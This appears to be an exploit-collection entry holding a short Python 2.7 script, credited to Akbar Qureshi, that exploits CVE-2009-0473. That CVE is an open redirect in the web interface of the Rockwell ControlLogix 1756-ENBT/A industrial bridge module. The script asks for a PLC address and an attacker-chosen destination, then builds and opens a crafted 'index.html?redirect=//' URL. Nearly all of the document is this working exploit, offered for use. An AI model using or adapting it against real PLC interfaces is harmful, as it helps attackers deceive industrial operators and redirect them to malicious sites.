CVE-2009-0473_Rockwell_Automation_ControlLogix_1756-ENBT_A_EtherNet_IP_Bridge_Module

# CVE-2009-0473 Rockwell Automation ControlLogix 1756-ENBT/A EtherNet/IP Bridge Module 重定向漏洞
==INFO==

## Description
Simple script to exploit open redirection vulnerability in Rockwell ControlLogix 1756-ENBT/A.

##Vulnerability Details
https://www.cvedetails.com/cve/CVE-2009-0473/

###Requirements
* Python 2.7
* You must be running an X Windows environment before executing this script.
* It will use Python’s “webbrowser” library to open the site using the default browser.

==EXP==

#Author : Akbar Qureshi

import webbrowser
import urllib2

class colors:
    alert = '\033[93m'
    end = '\033[0m'    
print colors.alert + """
###########################################################################
# Description: This script will exploit the open redirction vulnerability #
#	       in Rockwell ControlLogix 1756-ENBT/A			  #
# CVE Details: https://www.cvedetails.com/cve/CVE-2009-0473/      	  #
###########################################################################
""" + colors.end

plcurl = raw_input("Enter the plc web interface url: ")
try:
        url = urllib2.urlopen('http://%s' % plcurl, timeout=5)
except:
        print "Cannot open url,please try again"
else:
        open_redir = raw_input("Enter open redirection URL: " )
        url = "http://%s/index.html?redirect=//%s" % (plcurl,open_redir)
        webbrowser.open(url,new=1)

文章版权归作者所有，未经允许请勿转载。

THE END